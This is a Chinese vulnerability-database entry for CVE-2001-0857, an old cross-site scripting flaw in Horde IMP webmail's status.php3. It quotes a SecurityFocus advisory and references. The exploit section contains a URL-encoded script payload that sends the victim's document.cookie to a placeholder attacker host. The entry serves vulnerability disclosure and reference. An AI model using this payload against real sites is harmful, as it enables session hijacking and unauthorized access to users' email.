Horde IMP会话劫持漏洞

Horde IMP会话劫持漏洞

漏洞ID 1106513 漏洞类型 跨站脚本
发布时间 2001-11-09 更新时间 2005-05-02
图片[1]-Horde IMP会话劫持漏洞-安全小百科CVE编号 CVE-2001-0857
图片[2]-Horde IMP会话劫持漏洞-安全小百科CNNVD-ID CNNVD-200112-060
漏洞平台 Linux CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/21151
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200112-060
|漏洞详情
ImpWebmail2.2.6及其更早版本的status.php3存在跨站脚本攻击(XSS)漏洞。远程攻击者可以通过劫持会话cookies借助message参数获取其他用户电子邮件的访问权限。
|漏洞EXP
source: http://www.securityfocus.com/bid/3525/info

IMP is a powerful web-based mail interface/client developed by members of the Horde project.

Encoded HTML tags are not stripped from requests to access 'status.php3'. It is possible for a remote attacker to construct a link which when clicked will cause arbitrary script code to be executed in the browser of an unsuspecting user in the context of a site running Horde IMP.

As a result, it has been proven that this issue can be exploited to steal a legitimate user's cookie-based authentication credentials and gain unauthorized access to that user's webmail account. 

http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript
%3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co
m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B%
20%27%3E%27)%3B%3C%2Fscript%3E%0A
|参考资料

来源:BUGTRAQ
名称:20011110IMP2.2.7(SECURITY)released
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100540578822469&w;=2
来源:BUGTRAQ
名称:20011109ImpWebmailsessionhijackingvulnerability
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=100535679608486&w;=2
来源:XF
名称:imp-css-steal-cookies(7496)
链接:http://xforce.iss.net/static/7496.php
来源:BID
名称:3525
链接:http://www.securityfocus.com/bid/3525
来源:OSVDB
名称:668
链接:http://www.osvdb.org/668
来源:CALDERA
名称:CSSA-2001-039.0
链接:http://www.caldera.com/support/security/advisories/CSSA-2001-039.0.txt
来源:CONECTIVA
名称:CLA-2001:437
链接:http://distro.conectiva.com.br/atualizacoes/?id=a&anuncio;=000437

相关推荐: Multiple Vendor Fragmented IP Packets DoS Vulnerability

Multiple Vendor Fragmented IP Packets DoS Vulnerability 漏洞ID 1104190 漏洞类型 Failure to Handle Exceptional Conditions 发布时间 2000-05-19…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享